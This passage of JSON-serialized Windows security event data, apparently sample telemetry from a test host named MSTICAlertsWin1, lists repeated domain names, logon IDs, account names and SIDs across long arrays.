OUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632